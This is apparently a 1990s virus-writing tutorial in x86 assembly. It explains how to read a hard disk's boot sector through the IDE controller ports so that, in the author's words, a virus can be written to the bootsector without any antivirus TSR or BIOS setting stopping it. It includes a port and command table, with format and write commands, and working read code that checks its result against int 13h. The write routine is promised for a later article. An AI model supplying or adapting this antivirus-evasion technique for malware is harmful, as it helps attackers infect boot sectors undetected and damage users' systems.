; Reading the harddisk using ports! ; +-------------------------------+ by qark ; ; ; This took me months to get working but I finally managed it. ; ; Now you can write your virus to the bootsector and there is nothing any ; AV TSR or BIOS setting can do to stop it because we are using io ports ; to talk to the hard disk. ; ; This code only works for the 286+ so you must detect for 8088's somewhere ; in your code. ; ; Technical Information on the ports: ; Port Read/Write Misc ; ------ ------------ ------------------------------------------------- ; 1f0 r/w data register, the bytes are written/read here ; 1f1 r error register (look these values up yourself) ; 1f2 r/w sector count, how many sectors to read/write ; 1f3 r/w sector number, the actual sector wanted ; 1f4 r/w cylinder low, cylinders is 0-1024 ; 1f5 r/w cylinder high, this makes up the rest of the 1024 ; 1f6 r/w drive/head ; bit 7 = 1 ; bit 6 = 0 ; bit 5 = 1 ; bit 4 = 0 drive 0 select ; = 1 drive 1 select ; bit 3-0 head select bits ; 1f7 r status register ; bit 7 = 1 controller is executing a command ; bit 6 = 1 drive is ready ; bit 5 = 1 write fault ; bit 4 = 1 seek complete ; bit 3 = 1 sector buffer requires servicing ; bit 2 = 1 disk data read corrected ; bit 1 = 1 index - set to 1 each revolution ; bit 0 = 1 previous command ended in an error ; 1f7 w command register ; commands: ; 50h format track ; 20h read sectors with retry ; 21h read sectors without retry ; 22h read long with retry ; 23h read long without retry ; 30h write sectors with retry ; 31h write sectors without retry ; 32h write long with retry ; 33h write long without retry ; ; Most of these should work on even non-IDE hard disks. ; This code is for reading, the code for writing is the next article. mov dx,1f6h ;Drive and head port mov al,0a0h ;Drive 0, head 0 out dx,al mov dx,1f2h ;Sector count port mov al,1 ;Read one sector out dx,al mov dx,1f3h ;Sector number port mov al,1 ;Read sector one out dx,al mov dx,1f4h ;Cylinder low port mov al,0 ;Cylinder 0 out dx,al mov dx,1f5h ;Cylinder high port mov al,0 ;The rest of the cylinder 0 out dx,al mov dx,1f7h ;Command port mov al,20h ;Read with retry. out dx,al still_going: in al,dx test al,8 ;This means the sector buffer requires ;servicing. jz still_going ;Don't continue until the sector buffer ;is ready. mov cx,512/2 ;One sector /2 mov di,offset buffer mov dx,1f0h ;Data port - data comes in and out of here. rep insw ; ------ mov ax,201h ;Read using int13h then compare buffers. mov dx,80h mov cx,1 mov bx,offset buffer2 int 13h mov cx,512 mov si,offset buffer mov di,offset buffer2 repe cmpsb jne failure mov ah,9 mov dx,offset readmsg int 21h jmp good_exit failure: mov ah,9 mov dx,offset failmsg int 21h good_exit: mov ax,4c00h ;Exit the program int 21h readmsg db 'The buffers match. Hard disk read using ports.$' failmsg db 'The buffers do not match.$' buffer db 512 dup ('V') buffer2 db 512 dup ('L')